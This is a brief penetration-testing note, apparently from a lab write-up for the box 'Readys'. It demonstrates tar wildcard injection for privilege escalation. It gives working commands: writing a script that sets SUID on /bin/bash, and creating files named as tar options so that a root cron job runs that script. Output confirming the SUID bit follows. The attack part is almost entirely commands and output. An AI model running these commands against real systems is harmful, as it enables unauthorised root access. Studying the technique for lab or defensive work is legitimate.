Tar Wilcard Injection

Check to see where these scripts change their directory to. In this case it was the /var/www/html directory, somewhere were we have write access.


alice@readys:/var/www/html$ echo "chmod +s /bin/bash" > exploit.sh
echo "chmod +s /bin/bash" > exploit.sh

We then create two empty files using touch. The first will cause tar to cause a checkpoint on every file and the second will tell tar to execute our exploit.sh with bash on every checkpoint.

alice@readys:/var/www/html$ touch ./"--checkpoint=1"
touch ./"--checkpoint=1"
alice@readys:/var/www/html$ touch ./"--checkpoint-action=exec=bash exploit.sh"
touch ./"--checkpoint-action=exec=bash exploit.sh"

After a few minutes, we check if the cron job has run and if SUID is set on /bin/bash.

alice@readys:/var/www/html$ ls -l /bin/bash
ls -l /bin/bash
-rwsr-sr-x 1 root root 1168776 Apr 18  2019 /bin/bash

You can follow this blog for the other different methods to escalate.

Refer to the box Readys.


Last updated